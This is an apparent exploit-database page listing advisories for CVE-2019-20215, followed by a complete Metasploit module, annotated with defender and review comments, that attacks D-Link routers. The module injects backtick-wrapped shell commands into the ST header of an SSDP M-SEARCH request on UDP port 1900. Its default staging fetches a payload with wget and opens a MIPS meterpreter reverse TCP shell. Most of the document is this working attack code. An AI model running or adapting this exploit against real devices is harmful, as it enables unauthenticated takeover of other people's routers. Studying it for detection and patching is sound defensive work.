| Title | Published | Views | Family | |
|---|---|---|---|---|
| D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi Exploit | 10 Feb 2020 00:00 | – | zdt | |
| Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform | 8 Dec 2020 20:38 | – | gitee | |
| CVE-2019-20215 | 29 May 2018 15:50 | – | circl | |
| D-Link DIR-859 ssdpcgi() M-SEARCH arbitrary command execution vulnerability (CNVD-2020-13689) | 4 Feb 2020 00:00 | – | cnvd | |
| D-Link DIR-859 Remote Code Execution (CVE-2019-20215) | 21 May 2020 00:00 | – | checkpoint_advisories | |
| CVE-2019-20215 | 29 Jan 2020 02:23 | – | cve | |
| CVE-2019-20215 | 29 Jan 2020 02:23 | – | cvelist | |
| DLink DIR-859 1.05 & 1.06B01 Multiple Vulnerabilities (RCE) | 22 Dec 2023 00:00 | – | nessus | |
| D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi | 28 Jan 2020 19:15 | – | metasploit | |
| D-Link Unauthenticated Remote Command Execution using UPnP via a special crafted M-SEARCH packet. | 11 Jul 2014 14:17 | – | metasploit | |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2019-20215 (see 'References'): command
# injection through the ST (search target) header of an SSDP M-SEARCH request
# handled by ssdpcgi on D-Link devices. Nothing in this file sends credentials.
#
# Defender notes, derived from what this module puts on the wire:
# * Traffic is UDP to RPORT (default 1900) carrying an M-SEARCH request whose
#   ST value is "urn:device:1;" or "uuid:" followed by a backtick-quoted shell
#   command. Backticks in an ST value are a usable signal for IDS rules and
#   packet-capture review.
# * Staging is split into commands of at most 1500 characters (see #exploit),
#   so one run presumably produces a burst of such datagrams to the same host.
# * With the default 'wget' stager flavor the device is presumably told to
#   download the payload over HTTP, making outbound fetches from the router a
#   secondary indicator -- confirm against the CmdStager mixin.
# * Exposure is reduced by keeping UDP/1900 unreachable from untrusted
#   networks, disabling UPnP/SSDP where it is not needed, and applying the
#   vendor's fix for CVE-2019-20215 where one exists for the model.
class MetasploitModule < Msf::Exploit::Remote
  # Reliability rank advertised to the framework (module metadata).
  Rank = ExcellentRanking

  # Presumably the source of connect_udp / udp_sock / disconnect_udp, which
  # #execute_command calls but this file does not define.
  include Msf::Exploit::Remote::Udp
  # Presumably the source of execute_cmdstager, which #exploit calls.
  include Msf::Exploit::CmdStager

  # Registers the module's metadata and its single user-facing option.
  #
  # @param info [Hash] metadata supplied by the caller and merged with the
  #   values below through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
      'Description' => %q{
D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
},
      'Author' =>
        [
          's1kr10s',
          'secenv'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2019-20215'],
          ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
        ],
      'DisclosureDate' => 'Dec 24 2019',
      # Module metadata: the resulting session is declared privileged, i.e. a
      # successful run is treated as full compromise of the device.
      'Privileged' => true,
      'Platform' => 'linux',
      # Payload architecture is fixed to big-endian MIPS.
      'Arch' => ARCH_MIPSBE,
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'wget',
          # Default destination port, given as a String; #execute_command
          # calls to_s on the datastore value before using it.
          'RPORT' => '1900'
        },
      'Targets' =>
        [
          [ 'Auto', { } ],
        ],
      # Stager flavors this module permits; 'wget' is the default above.
      'CmdStagerFlavor' => %w{ echo wget },
      'DefaultTarget' => 0
    ))
    register_options(
      [
        # Required option, default 'URN', limited to 'URN' or 'UUID'. It picks
        # which ST prefix #execute_command uses.
        Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
      ])
  end

  # Framework entry point. Hands staging to execute_cmdstager with each staged
  # command capped at 1500 characters; the stager presumably delivers every
  # command through #execute_command.
  def exploit
    execute_cmdstager(linemax: 1500)
  end

  # Sends one SSDP M-SEARCH datagram whose ST header embeds +cmd+ between
  # backticks.
  #
  # @param cmd [String] command text, interpolated as-is with no escaping
  # @param opts [Object] unused in this method
  # @return [Object] result of disconnect_udp (the last expression)
  def execute_command(cmd, opts)
    # 'URN' or 'UUID', as constrained by the OptEnum registered in #initialize.
    type = datastore['VECTOR']
    # The two branches differ only in the ST prefix and the status message.
    # NOTE(review): the backtick quoting suggests the device hands the ST
    # value to a shell; that handler is not part of this file.
    if type == "URN"
      print_status("Target Payload URN")
      val = "urn:device:1;`#{cmd}`"
    else
      print_status("Target Payload UUID")
      val = "uuid:`#{cmd}`"
    end
    connect_udp
    header = "M-SEARCH * HTTP/1.1\r\n"
    # Host names the SSDP multicast group plus RPORT. The literal ends in
    # ": ", so the emitted value carries a space before the port number.
    header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
    # ST carries the injected value built above; this is the header to
    # inspect when writing detections.
    header << "ST:#{val}\r\n"
    header << "Man:\"ssdp:discover\"\r\n"
    header << "MX:2\r\n\r\n"
    udp_sock.put(header)
    # NOTE(review): not wrapped in ensure; if put raises, closing the socket
    # is left to whatever cleanup the framework performs.
    disconnect_udp
  end
end